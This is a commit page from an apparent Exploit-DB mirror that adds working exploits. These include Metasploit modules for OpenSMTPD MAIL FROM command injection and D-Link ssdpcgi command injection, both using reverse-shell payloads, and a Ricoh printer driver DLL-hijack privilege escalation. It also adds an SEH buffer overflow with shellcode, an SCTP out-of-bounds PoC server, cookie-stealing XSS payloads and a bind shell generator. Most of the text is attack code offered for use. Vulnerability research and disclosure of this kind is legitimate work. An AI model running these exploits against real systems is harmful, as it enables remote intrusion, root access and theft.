bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-11

Browse source 
11 changes to exploits/shellcodes

Dota 2 7.23f - Denial of Service (PoC)
usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
Ricoh Driver - Privilege Escalation (Metasploit)
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)
Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting

Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
This commit is contained in:
Offensive Security 2020-02-11 05:02:02 +00:00
parent 54935a7883
commit 8cbf7883c1
13 changed files with 778 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

76
exploits/linux/dos/48034.py Executable file
View file

@ -0,0 +1,76 @@
'''
usersctp is SCTP library used by a variety of software including WebRTC. There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bound reads. The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters, however there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, meanwhile, sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len.
To reproduce this issue:
1) run the attached 'server', initack.py
python init_ack.py
2) run the sample usersctp client
./programs/.libs/client 127.0.0.1 7 0 8888 7777
The client will crash.
'''
import sys
from socket import *
import zlib
ECHO_PORT = 7777
BUFSIZE = 1024
def getshort(arr):
return ord(arr[1]) + (ord(arr[0]) << 8);
def getlen(arr):
return ord(arr[0]) + (ord(arr[1]) << 8);
def main():
server()
def print_pack(pack):
o = ""
for item in pack:
o = o + hex(ord(item)) + " "
print "PACKET SENT", o
def server():
times = 0
if len(sys.argv) > 2:
port = eval(sys.argv[2])
else:
port = ECHO_PORT
s = socket(AF_INET, SOCK_DGRAM)
s.bind(('', port))
print 'udp echo server ready'
while 1:
data, addr = s.recvfrom(BUFSIZE)
pack = ""
for item in data:
pack = pack + hex(ord(item)) + " "
print 'server received %r from %r' % (pack, addr)
vtag = data[16:20]
type = ord(data[12])
length = getshort(data[14:])
port = "\x00\x07" + data[0:2]
print "type", type, "len", length, "plen", len(data)
ia = "\x86\x02\x01\x00\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\x18\x33\x03\xc3\x07\x00\x01\x8e\x05\x00\x07\x00\x14\x0b\x36\x14\x01\x30\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\xf9\x33\x05\x80\x03\x00\x01"
print "vtag", hex(ord(vtag[0])), hex(ord(vtag[1])), hex(ord(vtag[2])), hex(ord(vtag[3]))
o = port + "\0\0\0\0" + "\0\0\0\0" + vtag + ia[1:]
crc = zlib.crc32(o) & 0xffffffff
crcb= chr(crc&0xf) + chr((crc>> 8)&0xf) + chr((crc>> 16)&0xf) + chr((crc>> 24)&0xf)
o = port + vtag + crcb + ia[1:]
print_pack(o)
s.sendto(o, addr)
main()

128
exploits/linux/remote/48038.rb Executable file
View file

@ -0,0 +1,128 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Expect
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the MAIL FROM field during
SMTP interaction with OpenSMTPD to execute code as the root user.
},
'Author' => [
'Qualys', # Discovery and PoC
'wvu', # Module
'RageLtMan <rageltman[at]sempervictus>' # Module
],
'References' => [
['CVE', '2020-7247'],
['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
],
'DisclosureDate' => '2020-01-28',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [
['OpenSMTPD >= commit a8e222352f',
'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
))
register_options([
Opt::RPORT(25),
OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
])
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
])
end
def check
connect
res = sock.get_once
return CheckCode::Unknown unless res
return CheckCode::Detected if res =~ /^220.*OpenSMTPD/
CheckCode::Safe
rescue EOFError, Rex::ConnectionError => e
vprint_error(e.message)
CheckCode::Unknown
ensure
disconnect
end
def exploit
unless datastore['ForceExploit']
unless check == CheckCode::Detected
fail_with(Failure::Unknown, 'Set ForceExploit to override')
end
end
# We don't care who we are, so randomize it
me = rand_text_alphanumeric(8..42)
# Send mail to this valid recipient
to = datastore['RCPT_TO']
# Comment "slide" courtesy of Qualys - brilliant!
iter = rand_text_alphanumeric(15).chars.join(' ')
from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"
# This is just insurance, since the code was already written
if from.length > 64
fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
elsif (badchars = (from.chars & target['MyBadChars'])).any?
fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
end
# Create the mail body with comment slide and payload
body = "\r\n" + "#\r\n" * 15 + payload.encoded
sploit = {
nil => /220.*OpenSMTPD/,
"HELO #{me}" => /250.*pleased to meet you/,
"MAIL FROM:<#{from}>" => /250.*Ok/,
"RCPT TO:<#{to}>" => /250.*Recipient ok/,
'DATA' => /354 Enter mail.*itself/,
body => nil,
'.' => /250.*Message accepted for delivery/,
'QUIT' => /221.*Bye/
}
print_status('Connecting to OpenSMTPD')
connect
print_status('Saying hello and sending exploit')
sploit.each do |line, pattern|
send_expect(
line,
pattern,
sock: sock,
timeout: datastore['ExpectTimeout'],
newline: "\r\n"
)
end
rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue Timeout::Error => e
fail_with(Failure::TimeoutExpired, e.message)
ensure
disconnect
end
end

76
exploits/linux_mips/remote/48037.rb Executable file
View file

@ -0,0 +1,76 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => 'Dec 24 2019',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))
register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
end
def exploit
execute_cmdstager(linemax: 1500)
end
def execute_command(cmd, opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
val = "uuid:`#{cmd}`"
end
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
udp_sock.put(header)
disconnect_udp
end
end

11
exploits/multiple/dos/48035.txt Normal file
View file

@ -0,0 +1,11 @@
While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data.
Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data.
The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well.
I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive. I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48035.zip

35
exploits/multiple/webapps/48029.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Author: Prasenjit Kanti Paul
# Vendor Homepage: https://www.forcepoint.com/
# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
# Version: Forcepoint Web Security 8.5
# Tested on: Windows 7,10 and Linux Mint
# CVE : CVE-2019-6146
# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
# Video PoC: https://youtu.be/NfXGaNVK6eE
# Description: User must visit any site which is restricted as per
# forcepoint policy. So that forcepoint web security will show a generic
# page. While parsing "Domain Name" within generic page forcepoint is not
# validating Host header, which caused XSS.
Lets assume, while accessing anysite.com, forcepoint web security prevents
us to go to that website with its custom exception/blocking page. Now
follow the steps below:
*Steps*:
1. Intercept the traffic while accessing https://anysite.com
2. Modify the Host header from anysite.com to ">
<script>alert("evilsite")</script>
*Timeline:*
- Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
- Oct. 23, 2019 - ForcePoint team confirms the issue
- Oct. 24, 2019 - CVE-2019-6146 has been assigned
- Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes
*Regards,*
*Prasenjit Kanti Paul*

1
exploits/php/webapps/47992.txt
View file

@ -4,6 +4,7 @@
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version ERP-Ultimate
# CVE: CVE-2020-8504,CVE-2020-8505
# Tested on Windows 10/Kali Rolling
# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
# that leads to admin account creation and arbitrary user deletion.

26
exploits/php/webapps/48030.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108
1. Description
LearnDash is one of the most popular and easiest to use WordPress LMS plugins in the market. It allows users to easily create courses and sell them online and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.
2. Proof of Concept
Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.
[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.
3. Timeline
Vulnerability reported to the LearnDash team January 14, 2020
LearnDash version 3.1.2 containing the fix released January 14, 2020

53
exploits/windows/dos/48031.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949
Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to
achieve code execution or denial of service by creating a gaming server and
inviting a victim to this server, because a crafted map is mishandled
during a GetValue call.
Attacker need invite a victim to play on attacker game server using
specially crafted map or create custom game, then when initialize the game
of the victim, the specially crafted map will be automatically downloaded
and processed by the victim, which will lead to the possibility to exploit
vulnerability. Also attacker can create custom map and upload it to Steam
<https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.
Steps for reproduce:
1. Copy attached file zuff.vpk (
https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to map
directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\dota\maps)
2. Launch Dota2
3. Launch "zuff" map from Dota2 game console. Command for game console =
map zuff
4. Dota2 is crash (Access Violation)
Debug information:
(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2
beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
r8=00000000412ee51c r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b cmp byte ptr [rbx],dil
ds:0000027b`a23dd9b6=??

51
exploits/windows/local/48028.py Executable file
View file

@ -0,0 +1,51 @@
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a
## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully
#!/usr/bin/python
from struct import pack
buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a)
#0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)
shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
payload = buffer + nseh + seh + shellcode
try:
f=open("poc.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

164
exploits/windows/local/48036.rb Executable file
View file

@ -0,0 +1,164 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ricoh Driver Privilege Escalation',
'Description' => %q(
Various Ricoh printer drivers allow escalation of
privileges on Windows systems.
For vulnerable drivers, a low-privileged user can
read/write files within the `RICOH_DRV` directory
and its subdirectories.
`PrintIsolationHost.exe`, a Windows process running
as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
during the installation of a printer. A user can
elevate to SYSTEM by writing a malicious DLL to
the vulnerable driver directory and adding a new
printer with a vulnerable driver.
This module leverages the `prnmngr.vbs` script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.
),
'License' => MSF_LICENSE,
'Author' => [
'Alexander Pudwill', # discovery & PoC
'Pentagrid AG', # PoC
'Shelby Pace' # msf module
],
'References' =>
[
[ 'CVE', '2019-19363'],
[ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'win',
'Payload' =>
{
},
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[[
'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
]],
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ],
'Stability' => [ SERVICE_RESOURCE_LOSS ]
},
'DisclosureDate' => "Jan 22 2020",
'DefaultTarget' => 0
))
self.needs_cleanup = true
register_advanced_options([
OptBool.new('ForceExploit', [ false, 'Override check result', false ])
])
end
def check
dir_name = "C:\\ProgramData\\RICOH_DRV"
return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
driver_names = dir(dir_name)
return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
vulnerable = false
driver_names.each do |driver_name|
full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
next unless directory?(full_path)
@driver_path = full_path
res = cmd_exec("icacls \"#{@driver_path}\"")
next unless res.include?('Everyone:')
next unless res.match(/\(F\)/)
vulnerable = true
break
end
return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable
vprint_status("Vulnerable driver directory: #{@driver_path}")
CheckCode::Appears('Ricoh driver directory has full permissions')
end
def add_printer(driver_name)
fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
dll_data = generate_payload_dll
dll_path = "#{@driver_path}\\headerfooter.dll"
temp_path = expand_path('%TEMP%\\headerfooter.dll')
vprint_status("Writing dll to #{temp_path}")
bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
bat_file = <<~HEREDOC
:repeat
#{cp_cmd} && goto :repeat
HEREDOC
write_file(bat_file_path, bat_file)
write_file(temp_path, dll_data)
register_files_for_cleanup(bat_file_path, temp_path)
script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
print_status("Adding printer #{@printer_name}...")
client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
vprint_status("Executing script...")
cmd_exec(bat_cmd)
rescue Rex::Post::Meterpreter::RequestError => e
e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
end
def exploit
fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'
if sysinfo['Architecture'] != payload.arch.first
fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
end
@driver_path = ''
unless check == CheckCode::Appears || datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
end
@printer_name = Rex::Text.rand_text_alpha(5..9)
@script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
drvr_name = @driver_path.split('\\')
drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
drvr_name = drvr_name[drvr_name_idx]
add_printer(drvr_name)
end
def cleanup
print_status("Deleting printer #{@printer_name}")
Rex.sleep(3)
delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
end
end

9
files_exploits.csv
View file

@ -6674,6 +6674,9 @@ id,file,description,date,author,type,platform,port
48013,exploits/windows/dos/48013.py,"TapinRadio 2.12.3 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48014,exploits/windows/dos/48014.py,"RarmaRadio 2.72.4 - 'username' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48015,exploits/windows/dos/48015.py,"RarmaRadio 2.72.4 - 'server' Denial of Service (PoC)",2020-02-06,chuyreds,dos,windows,
48031,exploits/windows/dos/48031.txt,"Dota 2 7.23f - Denial of Service (PoC)",2020-02-10,"Bogdan Kurinnoy",dos,windows,
48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10938,6 +10941,8 @@ id,file,description,date,author,type,platform,port
48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,
48028,exploits/windows/local/48028.py,"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow",2020-02-10,ZwX,local,windows,
48036,exploits/windows/local/48036.rb,"Ricoh Driver - Privilege Escalation (Metasploit)",2020-02-10,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17970,6 +17975,8 @@ id,file,description,date,author,type,platform,port
47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21
47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.2 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42323,3 +42330,5 @@ id,file,description,date,author,type,platform,port
48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,
48029,exploits/multiple/webapps/48029.txt,"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting",2020-02-10,"Prasenjit Kanti Paul",webapps,multiple,
48030,exploits/php/webapps/48030.txt,"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting",2020-02-10,"Jinson Varghese Behanan",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1014,3 +1014,4 @@ id,file,description,date,author,type,platform
47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows
48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux

1 id file description date author type platform
1014 47890 shellcodes/linux/47890.c Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) 2020-01-08 Xenofon Vassilakopoulos shellcode linux
1015 47953 shellcodes/windows/47953.c Windows/7 - Screen Lock Shellcode (9 bytes) 2020-01-22 Saswat Nayak shellcode windows
1016 47980 shellcodes/windows/47980.txt Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) 2020-01-30 boku shellcode windows
1017 48032 shellcodes/linux/48032.py Linux/x86 - Bind Shell Generator Shellcode (114 bytes) 2020-02-10 boku shellcode linux

147
shellcodes/linux/48032.py Executable file
View file

@ -0,0 +1,147 @@
# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
# Author: Bobby Cooke
# Date: 2020-01-29
# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386
#!/usr/bin/python
# Take users TCP port as input
port = raw_input("Enter TCP Port Number: ")
# Convert input string to an integer
deciPort = int(port)
# Format the integer to Hex Integer
hexPort = "{:02x}".format(deciPort)
#print "Hex value of Decimal Number:",hexPort
# Check the length of the output hex string
hexStrLen = len(hexPort)
